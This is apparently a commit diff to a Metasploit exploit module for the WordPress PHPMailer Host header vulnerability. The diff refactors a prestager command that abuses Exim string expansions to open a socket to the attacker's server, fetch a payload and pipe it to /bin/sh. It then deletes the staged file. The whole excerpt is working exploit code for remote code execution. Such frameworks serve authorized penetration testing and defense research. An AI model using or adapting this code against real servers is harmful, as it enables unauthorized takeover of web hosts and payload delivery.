Use reduce instead of extracting twice

modules/exploits/unix/webapp/wp_phpmailer_host_header.rb

@@ -96,11 +96,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # Absolute paths are required for prestager commands due to execve(2)
   def generate_prestager
-    prestager  = []
+    prestager = []
+
     # This is basically sh -c `wget` implemented using Exim string expansions
-    prestager << '/bin/sh -c ${extract{-1}{${run{/bin/echo}}}{${readsocket{' \
-                 "inet:#{srvhost_addr}:#{srvport}}{get #{get_resource} "\
-                 'http/1.0${extract{0}{${run{/bin/echo}}}{$value$value}}}}}}'
+    prestager << "/bin/sh -c ${reduce{get #{get_resource} http/1.0}" \
+      '{${run{/bin/echo}}}{${extract{-1}{$value}{${readsocket' \
+      "{inet:#{srvhost_addr}:#{srvport}}{$item$value$value}}}}}}"
+
     # CmdStager should rm the file, but it blocks on the payload, so we do it
     prestager << "/bin/rm -f #{cmdstager_path}"
   end